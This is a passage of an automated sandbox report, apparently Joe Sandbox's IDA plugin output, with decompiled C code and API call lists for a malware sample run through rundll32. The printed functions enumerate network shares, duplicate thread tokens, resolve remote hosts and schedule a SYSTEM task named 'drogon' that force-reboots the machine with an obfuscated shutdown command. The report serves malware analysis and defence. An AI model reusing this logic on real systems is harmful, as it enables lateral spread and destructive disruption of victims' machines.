                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,746543E0,?,00000000,?,?,007B7B89,000000FF), ref: 007BA436
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA439
                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 007BA454
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,007B7B89,000000FF), ref: 007BA463
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA466
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocCreateFreeThread
                                                                                                                                                                                        • String ID: Uet0Xet
                                                                                                                                                                                        • API String ID: 3966119241-1689521831
                                                                                                                                                                                        • Opcode ID: b10e5e7d3d984fd0d2ca7bf97db75f47105515f6885fd2a814cc2a21053053d7
                                                                                                                                                                                        • Instruction ID: d2b9643642cfbd3a189aa0098479c967dd8e130cc08a50fc2683d72eacd08f6c
                                                                                                                                                                                        • Opcode Fuzzy Hash: b10e5e7d3d984fd0d2ca7bf97db75f47105515f6885fd2a814cc2a21053053d7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AF030F5500259BFD7207FA99C8DEDBBFACEB85394B108529F601D3100D5789D04CA64
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B75D8(intOrPtr _a4, int _a8) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				int _t42;
                                                                                                                                                                                        				short* _t47;
                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                        				signed int _t56;
                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v12 = _v12 | 0xffffffff;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v8 = 0x4000;
                                                                                                                                                                                        				_t36 = WNetOpenEnumW(1, 0, 0, _a8,  &_v20); // executed
                                                                                                                                                                                        				if(_t36 == 0) {
                                                                                                                                                                                        					_t38 = GlobalAlloc(0x40, _v8); // executed
                                                                                                                                                                                        					_t63 = _t38;
                                                                                                                                                                                        					_v24 = _t63;
                                                                                                                                                                                        					if(_t63 != 0) {
                                                                                                                                                                                        						_v16 = 1;
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							memset(_t63, 0, _v8);
                                                                                                                                                                                        							_t67 = _t67 + 0xc;
                                                                                                                                                                                        							_t42 = WNetEnumResourceW(_v20,  &_v12, _t63,  &_v8);
                                                                                                                                                                                        							if(_t42 != 0) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_a8 = 0;
                                                                                                                                                                                        							if(_v12 > 0) {
                                                                                                                                                                                        								_t16 = _t63 + 0x14; // 0x14
                                                                                                                                                                                        								_t61 = _t16;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t55 = 2;
                                                                                                                                                                                        									if(( *(_t61 - 8) & _t55) != _t55) {
                                                                                                                                                                                        										_t47 =  *_t61;
                                                                                                                                                                                        										if(_t47 != 0 &&  *_t47 == 0x5c &&  *((short*)(_t47 + 2)) == 0x5c) {
                                                                                                                                                                                        											_t56 =  *(_t47 + 4) & 0x0000ffff;
                                                                                                                                                                                        											if(_t56 != 0) {
                                                                                                                                                                                        												_t66 = _t56;
                                                                                                                                                                                        												while(_t66 != 0x5c) {
                                                                                                                                                                                        													_t55 = _t55 + 1;
                                                                                                                                                                                        													_t58 =  *(_t47 + _t55 * 2) & 0x0000ffff;
                                                                                                                                                                                        													_t66 = _t58;
                                                                                                                                                                                        													if(_t58 != 0) {
                                                                                                                                                                                        														continue;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													goto L15;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L15:
                                                                                                                                                                                        											 *(_t47 + _t55 * 2) = 0;
                                                                                                                                                                                        											E007B6B95( *_t61 + 4, 0, _a4);
                                                                                                                                                                                        											_t63 = _v24;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_t18 = _t61 - 0x14; // 0x0
                                                                                                                                                                                        										E007B75D8(_a4, _t18);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_a8 = _a8 + 1;
                                                                                                                                                                                        									_t61 = _t61 + 0x20;
                                                                                                                                                                                        								} while (_a8 < _v12);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t42 != 0x103) {
                                                                                                                                                                                        							_v16 = 0;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						GlobalFree(_t63);
                                                                                                                                                                                        						WNetCloseEnum(_v20);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v16;
                                                                                                                                                                                        			}




















                                                                                                                                                                                        0x007b76d9
                                                                                                                                                                                        0x007b76e2
                                                                                                                                                                                        0x007b76e2
                                                                                                                                                                                        0x007b76e8
                                                                                                                                                                                        0x007b76ef

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 007B75FD
                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 007B7611
                                                                                                                                                                                        • memset.MSVCRT ref: 007B762C
                                                                                                                                                                                        • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 007B7640
                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 007B76D9
                                                                                                                                                                                        • WNetCloseEnum.MPR(0000FFFF), ref: 007B76E2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4070278229-0
                                                                                                                                                                                        • Opcode ID: d030c1eadeabae9df1c37766c12aaa63266ecda7fe734fc6dbed5ce2e296ea7d
                                                                                                                                                                                        • Instruction ID: 13e4684ccecbfa0db0f8e4c5f1f127c24f9c42d460684551c65d6470b43ef8b3
                                                                                                                                                                                        • Opcode Fuzzy Hash: d030c1eadeabae9df1c37766c12aaa63266ecda7fe734fc6dbed5ce2e296ea7d
                                                                                                                                                                                        • Instruction Fuzzy Hash: C331B072804519EFCB24AF99CC85EEEBBB9FF84308B118169F514E7250D7389E50CB61
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B8192() {
                                                                                                                                                                                        				short _v6;
                                                                                                                                                                                        				short _v8;
                                                                                                                                                                                        				short _v10;
                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                        				short _v14;
                                                                                                                                                                                        				short _v16;
                                                                                                                                                                                        				short _v18;
                                                                                                                                                                                        				short _v20;
                                                                                                                                                                                        				short _v22;
                                                                                                                                                                                        				short _v24;
                                                                                                                                                                                        				short _v26;
                                                                                                                                                                                        				short _v28;
                                                                                                                                                                                        				short _v30;
                                                                                                                                                                                        				short _v32;
                                                                                                                                                                                        				short _v34;
                                                                                                                                                                                        				short _v36;
                                                                                                                                                                                        				short _v38;
                                                                                                                                                                                        				short _v40;
                                                                                                                                                                                        				short _v42;
                                                                                                                                                                                        				short _v44;
                                                                                                                                                                                        				short _v46;
                                                                                                                                                                                        				short _v48;
                                                                                                                                                                                        				short _v50;
                                                                                                                                                                                        				short _v52;
                                                                                                                                                                                        				struct _SYSTEMTIME _v68;
                                                                                                                                                                                        				short _v1628;
                                                                                                                                                                                        				short _v3676;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                        				short _t56;
                                                                                                                                                                                        				short _t57;
                                                                                                                                                                                        				short _t58;
                                                                                                                                                                                        				short _t59;
                                                                                                                                                                                        				short _t60;
                                                                                                                                                                                        				short _t61;
                                                                                                                                                                                        				short _t62;
                                                                                                                                                                                        				short _t63;
                                                                                                                                                                                        				short _t64;
                                                                                                                                                                                        				short _t65;
                                                                                                                                                                                        				short _t66;
                                                                                                                                                                                        				short _t67;
                                                                                                                                                                                        				short _t68;
                                                                                                                                                                                        				short _t69;
                                                                                                                                                                                        				short _t70;
                                                                                                                                                                                        				short _t79;
                                                                                                                                                                                        				short _t80;
                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                        				short _t86;
                                                                                                                                                                                        				short _t87;
                                                                                                                                                                                        				short _t89;
                                                                                                                                                                                        				short _t90;
                                                                                                                                                                                        				short _t92;
                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t80 = 0;
                                                                                                                                                                                        				if(( *0x7c7bc0 & 0x00000002) != 0) {
                                                                                                                                                                                        					GetLocalTime( &_v68);
                                                                                                                                                                                        					_t48 = E007B6477();
                                                                                                                                                                                        					if(_t48 < 0xf) {
                                                                                                                                                                                        						_t48 = 0xf;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t49 = (_v68.wMinute & 0x0000ffff) + _t48 + 3;
                                                                                                                                                                                        					_t82 = 0x3c;
                                                                                                                                                                                        					_t101 = _t49 % _t82;
                                                                                                                                                                                        					_t84 = 0x18;
                                                                                                                                                                                        					_t98 = ((_v68.wHour & 0x0000ffff) + _t49 / _t82) % _t84;
                                                                                                                                                                                        					if(GetSystemDirectoryW( &_v1628, 0x30c) != 0) {
                                                                                                                                                                                        						_t56 = 0x73;
                                                                                                                                                                                        						_v52 = _t56;
                                                                                                                                                                                        						_t57 = 0x68;
                                                                                                                                                                                        						_v50 = _t57;
                                                                                                                                                                                        						_t58 = 0x75;
                                                                                                                                                                                        						_v48 = _t58;
                                                                                                                                                                                        						_t59 = 0x74;
                                                                                                                                                                                        						_v46 = _t59;
                                                                                                                                                                                        						_t60 = 0x64;
                                                                                                                                                                                        						_v44 = _t60;
                                                                                                                                                                                        						_t61 = 0x6f;
                                                                                                                                                                                        						_v42 = _t61;
                                                                                                                                                                                        						_t62 = 0x77;
                                                                                                                                                                                        						_v40 = _t62;
                                                                                                                                                                                        						_t63 = 0x6e;
                                                                                                                                                                                        						_v38 = _t63;
                                                                                                                                                                                        						_t64 = 0x2e;
                                                                                                                                                                                        						_v36 = _t64;
                                                                                                                                                                                        						_t65 = 0x65;
                                                                                                                                                                                        						_v34 = _t65;
                                                                                                                                                                                        						_t66 = 0x78;
                                                                                                                                                                                        						_v32 = _t66;
                                                                                                                                                                                        						_t67 = 0x65;
                                                                                                                                                                                        						_v30 = _t67;
                                                                                                                                                                                        						_t68 = 0x20;
                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                        						_t86 = 0x2f;
                                                                                                                                                                                        						_v26 = _t86;
                                                                                                                                                                                        						_t87 = 0x72;
                                                                                                                                                                                        						_v24 = _t87;
                                                                                                                                                                                        						_v22 = _t68;
                                                                                                                                                                                        						_t89 = 0x2f;
                                                                                                                                                                                        						_v20 = _t89;
                                                                                                                                                                                        						_t90 = 0x74;
                                                                                                                                                                                        						_v18 = _t90;
                                                                                                                                                                                        						_v16 = _t68;
                                                                                                                                                                                        						_t92 = 0x30;
                                                                                                                                                                                        						_v12 = _t68;
                                                                                                                                                                                        						_t69 = 0x2f;
                                                                                                                                                                                        						_v10 = _t69;
                                                                                                                                                                                        						_t70 = 0x66;
                                                                                                                                                                                        						_v8 = _t70;
                                                                                                                                                                                        						_v6 = 0;
                                                                                                                                                                                        						_v14 = _t92;
                                                                                                                                                                                        						if(PathAppendW( &_v1628,  &_v52) != 0) {
                                                                                                                                                                                        							wsprintfW( &_v3676, L"schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00",  &_v1628, _t98, _t101);
                                                                                                                                                                                        							_t79 = E007B7FB7( &_v3676, 0); // executed
                                                                                                                                                                                        							_t80 = _t79;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t80;
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 007B81AF
                                                                                                                                                                                          • Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B81F2
                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 007B82AF
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B82CE
                                                                                                                                                                                          • Part of subcall function 007B7FB7: wsprintfW.USER32 ref: 007B7FD6
                                                                                                                                                                                          • Part of subcall function 007B7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
                                                                                                                                                                                          • Part of subcall function 007B7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
                                                                                                                                                                                          • Part of subcall function 007B7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
                                                                                                                                                                                          • Part of subcall function 007B7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
                                                                                                                                                                                          • Part of subcall function 007B7FB7: Sleep.KERNELBASE(00000000), ref: 007B807F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 007B82C8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                                                                                                                                                                        • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                                                                                                                                                                        • API String ID: 2586884543-3727968613
                                                                                                                                                                                        • Opcode ID: 3bec61529108fbe772800c7c242ecd3c6975151aaec5f0bdf12402c011eb8388
                                                                                                                                                                                        • Instruction ID: 9e651c29b978cd5037b179808eb774b5506bf61f0ef0a6e691ccde8aab50ba35
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bec61529108fbe772800c7c242ecd3c6975151aaec5f0bdf12402c011eb8388
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F41C426A58348A9EB10DBE4EC16BFE73B5EF84B10F10541BE604EB1D0FAB55A80C359
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                                                        			E007BA016(void* _a7312, void* _a7316, void* _a7324) {
                                                                                                                                                                                        				short _v36;
                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                        				HANDLE* _t23;
                                                                                                                                                                                        				HANDLE* _t51;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v48 = 0;
                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                        				_t21 = OpenThreadToken(GetCurrentThread(), 0xb, 1,  &_v48);
                                                                                                                                                                                        				_t57 = _t21;
                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                        					DuplicateTokenEx(_v48, 0x2000000, 0, 2, 2,  &_v44);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v40 =  *0x7c7bb8;
                                                                                                                                                                                        				_t23 = E007B6C5F(0x24, E007B6AA8, 0, 0xffff); // executed
                                                                                                                                                                                        				_t51 = _t23;
                                                                                                                                                                                        				E007B75D8(_t51, 0); // executed
                                                                                                                                                                                        				E007B76F2(_t51); // executed
                                                                                                                                                                                        				E007B6CC8(_t51);
                                                                                                                                                                                        				_t45 = _t51;
                                                                                                                                                                                        				_t43 = E007B6B0E(_t51, _t57,  &_v64);
                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						if(E007B9534( &_v36, 0, 0, 0) != 0) {
                                                                                                                                                                                        							E007B6B5F( &_v36, _t51, _t43);
                                                                                                                                                                                        							_t45 =  &_v44;
                                                                                                                                                                                        							E007B6B5F( &_v44, _v48, 0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v36 = 0;
                                                                                                                                                                                        					} while (E007B6AD0(_t45,  &_v36) != 0);
                                                                                                                                                                                        					E007B6B46(_t43);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v48 != 0) {
                                                                                                                                                                                        					CloseHandle(_v48);
                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v44 != 0) {
                                                                                                                                                                                        					CloseHandle(_v44);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 007BA035
                                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,007BA1D0,00000000), ref: 007BA03C
                                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 007BA059
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA0F5
                                                                                                                                                                                        • CloseHandle.KERNEL32(0000FFFF,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA105
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3602278934-0
                                                                                                                                                                                        • Opcode ID: ff27cb35c32adb5a3e2b54e4ddd391d417f9f7562b4ee0c7e9003471405f244f
                                                                                                                                                                                        • Instruction ID: 02e52dd1f708a75a98f02ae991adb94f77d76c3457807101c4cc8f672033ea2d
                                                                                                                                                                                        • Opcode Fuzzy Hash: ff27cb35c32adb5a3e2b54e4ddd391d417f9f7562b4ee0c7e9003471405f244f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D214D71508345BAD620FB659C49FABBBECEFC5710F004929B654D2061FA7CD904CBA6
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                        			E007B9376(short* _a4, short* _a8) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                        				char _v548;
                                                                                                                                                                                        				char _v1068;
                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                        				short* _t20;
                                                                                                                                                                                        				char* _t25;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 =  *0x7c7b94;
                                                                                                                                                                                        				_t19 =  *0x7c3984; // 0x444ff8
                                                                                                                                                                                        				_v12 = _t19;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_t20 = PathFindFileNameW(0x7c7bc8);
                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                        					_t35 =  &_v548;
                                                                                                                                                                                        					WideCharToMultiByte(0xfde9, 0, _t20, 0xffffffff,  &_v548, 0x104, 0, 0);
                                                                                                                                                                                        					WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff,  &_v284, 0x104, 0, 0);
                                                                                                                                                                                        					_t25 =  &_v284;
                                                                                                                                                                                        					__imp__#11(_t25);
                                                                                                                                                                                        					if(_t25 != 0xffffffff || E007B9332( &_v284,  &_v284) != 0) {
                                                                                                                                                                                        						WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v1068, 0x208, 0, 0);
                                                                                                                                                                                        						_t31 = E007B5337(_t35,  &_v284,  &_v1068,  &_v548, _v12, _v16); // executed
                                                                                                                                                                                        						if(_t31 == 0) {
                                                                                                                                                                                        							_v8 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(007C7BC8,?,00000000,00000000), ref: 007B939C
                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 007B93C8
                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 007B93DF
                                                                                                                                                                                        • inet_addr.WS2_32(?), ref: 007B93E8
                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 007B9418
                                                                                                                                                                                          • Part of subcall function 007B9332: gethostbyname.WS2_32(007B93FF), ref: 007B933B
                                                                                                                                                                                          • Part of subcall function 007B9332: wsprintfA.USER32 ref: 007B9365
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3160354238-0
                                                                                                                                                                                        • Opcode ID: 001c24a362a974d53f321b4440a61dbcbec19d63fd106750482f60a58ac2a39e
                                                                                                                                                                                        • Instruction ID: 65252dcf67edd1f11ab72e981476de3c3ed50822fbce811fdc0936a1424032b0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 001c24a362a974d53f321b4440a61dbcbec19d63fd106750482f60a58ac2a39e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E21EDB290011CBEDB50DB949C85EEF77BCEB04364F5042A9B724D2190DA789E459B60
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B6C5F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				struct _CRITICAL_SECTION* _t24;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t24 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                                                        					InitializeCriticalSection(_t24);
                                                                                                                                                                                        					_t14 = _a16;
                                                                                                                                                                                        					 *(_t24 + 0x20) = _t14;
                                                                                                                                                                                        					 *((intOrPtr*)(_t24 + 0x1c)) = _a4;
                                                                                                                                                                                        					 *((intOrPtr*)(_t24 + 0x2c)) = _a8;
                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                        					 *((intOrPtr*)(_t24 + 0x24)) = 0;
                                                                                                                                                                                        					 *((intOrPtr*)(_t24 + 0x30)) = _a12;
                                                                                                                                                                                        					_t17 = RtlAllocateHeap(GetProcessHeap(), 8, _t14 << 2); // executed
                                                                                                                                                                                        					 *(_t24 + 0x18) = _t17;
                                                                                                                                                                                        					if(_t17 == 0) {
                                                                                                                                                                                        						E007B6BD1(_t22, _t24);
                                                                                                                                                                                        						_t24 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C6F
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C78
                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C81
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6CAC
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6CAF
                                                                                                                                                                                          • Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C29
                                                                                                                                                                                          • Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C2C
